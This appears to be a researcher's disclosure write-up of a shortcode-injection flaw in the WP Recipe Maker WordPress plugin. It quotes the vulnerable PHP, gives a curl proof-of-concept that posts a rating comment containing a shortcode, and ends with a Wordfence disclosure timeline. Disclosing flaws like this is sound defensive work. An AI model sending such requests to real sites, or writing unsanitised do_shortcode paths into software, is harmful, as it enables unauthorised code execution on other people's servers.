WP Recipe Maker is a popular WordPress plugin to create and display recipes with structured recipe data, ratings, and other features useful for food and recipe websites. The plugin has more than 50k active installations and over 4.01 million total downloads, making it a widely used plugin in the WordPress ecosystem.
The Vulnerability
The vulnerability affects WP Recipe Maker version 10.8.1 and earlier and allows an unauthenticated attacker to execute arbitrary registered WordPress shortcode execution through approved recipe-rating comments.
The vulnerable code located at includes/public/class-wprm-metadata.php
The WPRM_Metadata::get_metadata_details() is generating review metadata and later the plugin retrieves approved comments containing the wprm-comment-rating metadata and places the comment content directly into the reviewBody field.
if ( $comments ) {
$reviews = array();
foreach ( $comments as $comment ) {
$author = $comment->comment_author;
$body = $comment->comment_content;
if ( $author && $body ) {
$rating = intval( get_comment_meta( $comment->comment_ID, 'wprm-comment-rating', true ) );
if ( $rating ) {
$reviews[] = array(
'@type' => 'Review',
'reviewRating' => array(
'@type' => 'Rating',
'ratingValue' => $rating,
),
'reviewBody' => $body,
'author' => array(
'@type' => 'Person',
'name' => $author,
),
'datePublished' => gmdate( 'Y-m-d', strtotime( $comment->comment_date ) ),
);
}
}
}
if ( $reviews ) {
$metadata['review'] = $reviews;
$metadata['aggregateRating']['reviewCount'] = count( $reviews );
}
}
As the function is taking the comment content directly from the database and later assigning into reviewBody without any filtering, it allows attacker-controlled comment content to enter the recipe metadata once the comment has been approved.
$body = $comment->comment_content;
and later assigned to:
'reviewBody' => $body,
Second critical function is WPRM_Metadata::sanitize_metadata():
public static function sanitize_metadata( $metadata ) {
$sanitized = array();
if ( is_array( $metadata ) ) {
foreach ( $metadata as $key => $value ) {
$sanitized[ $key ] = self::sanitize_metadata( $value );
}
} else {
$sanitized = strip_shortcodes( wp_strip_all_tags( do_shortcode( $metadata ) ) );
}
return $sanitized;
}
The function recursively process metadata and finally pass it to do_shortcode()
do_shortcode( $metadata )
The reviewBody contains attacker-controlled comment content, any registered WordPress shortcode included in the comment is processed by the do_shortcode() when the recipe metadata is generated. The resulting value is later passed through wp_strip_all_tags() and strip_shortcodes() but it doesn't prevent exploitation because the shortcode has already been executed.
An unauthenticated attacker can submit a recipe-rating comment containing a shortcode. Once the comment is approved, either manually or automatically through WordPress comment approval settings, WP Recipe Maker generates the recipe metadata and processes the attacker-controlled comment content. During this process, the shortcode is passed to do_shortcode(), resulting in shortcode execution on the server.
A simple exploitation request can be made by submitting a recipe-rating comment containing a WordPress shortcode in the comment parameter/input.
curl -i 'https://wordpress-example.com/wp-comments-post.php' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'comment_post_ID=43' \
--data-urlencode 'comment_parent=0' \
--data-urlencode 'author=PoC Shortcode' \
--data-urlencode 'email=wp@local.com' \
--data-urlencode 'comment=[gallery ids="17" columns="70"]' \
--data-urlencode 'wprm-comment-rating=5' \
--data-urlencode 'submit=Post Comment'
The severity of this behavior depends on the shortcodes registered on the affected website. If another installed plugin or custom functionality exposes a shortcode capable of executing PHP, server-side code, or similarly dangerous functionality, this shortcode-execution primitive could potentially be chained into remote code execution.
Disclosure Timeline
- Aug 14, 2026 : I reported the vulnerability to the Wordfence Intelligence Bug Bounty Program.
- Sep 11, 2026 : The report was validated and CVE-2026-89274 was assigned.
- Sep 18, 2026 : The CVE was disclosed publicly.